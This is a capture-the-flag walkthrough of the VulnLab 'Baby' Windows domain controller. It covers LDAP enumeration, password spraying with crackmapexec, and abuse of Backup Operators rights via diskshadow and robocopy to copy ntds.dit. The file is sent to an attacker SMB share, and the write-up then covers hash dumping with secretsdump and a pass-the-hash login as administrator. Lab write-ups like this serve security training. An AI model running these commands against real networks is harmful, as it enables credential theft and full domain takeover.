Where Notes Work
BABY – VULNLAB
This is the Write-up/Walkthrough of the BABY Machine from VULNLAB.
NMAP SCAN:
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-08-12 06:36:42Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: baby.vl, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: BABY
| NetBIOS_Domain_Name: BABY
| NetBIOS_Computer_Name: BABYDC
| DNS_Domain_Name: baby.vl
| DNS_Computer_Name: BabyDC.baby.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-08-12T06:36:52+00:00
|_ssl-date: 2023-08-12T06:37:31+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Issuer: commonName=BabyDC.baby.vl
Domain: baby.vl, BIOS Name: BabyDC
Looking for smb, tried connecting to it as anonymous, but it was not allowed, looking forward, i used ldapsearch to enumerate the domain with blank credentials.
ldapsearch -H ldap://10.10.92.79 -D '' -w '' -b "DC=baby,DC=vl"
Looking for the output result, found the password for user teresa.bell on Description flag.
after, that extracted all usernames, using grep for “dn”, and remove extra usernames which is not useful and make username like, if name is “John Doe” then add . between first and last name and remove the extra space, e.g: john.doe
cat ldap_search | grep dn | grep -o 'CN=[^,]*'
after that used crackmapexec, to brute the usernames using the found password.
crackmapexec smb 10.10.92.79 -u usernames.txt -p 'BabyStart123!'
didn’t found any valid user for founded credential but got to know that user caroline.robinson password must be change for smb, used smbpasswd command to change the password of caroline.robinson.
smbpasswd -r 10.10.92.79 -U caroline.robinson
Enter founded password on Old SMB password and set the new password for user caroline.robinson.
after that, used evil-winrm to connect to caroline.robinson and got the user flag.
evil-winrm -u caroline.robinson -p 'hacker@123' -i 10.10.92.79
found that user caroline.robinson is in Backup Operators group, which means user can backup and restore and files on the system.
net user caroline.robinson /domain
whoami /all
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Creating Distributed Shell file and adding commands which will be used by diskshadow.
set context persistent nowriters
add volume c: alias kunal
create
expose %kunal% z:
unix2dos kunal.dsh
then upload the file using evil-winrm download functionality, and used diskshadow command to create a copy of C drive to new drive named Z:
diskshadow /s kunal.dsh
diskshadow command successfully copied the C: drive to Z: drive.
robocopy /B Z:\Windows\NTDS . ntds.dit
after that, tried to download ntds.dit file using download funcationality of winrm, but it was failing, so i started the smbserver using impacket-smbserver and copied the ntds.dit to my linux machine.
Starting the smb server on linux.
impacket-smbserver -smb2support share.
copying the ntds.dit file.
copy ntds.dit \\YOUR-TUNNEL-IP\share\ntds.dit
after that used secretsdump from impacket to dump the hashes from ntds.dit and system.hive, to dump the system file from registry.
reg save hklm\system system.hive
Downloaded the system.hive also to linux machine.
impacket-secretsdump -ntds ntds.dit -system system.hive local
after getting the hash of administrator, used evil-winrm to connect to administrator account using pass the hash method.
evil-winrm -u administrator -H ee4457ae59f1e3fbd764e33d9cef123d -i 10.10.88.6
If you face any problems, let me know in the comment.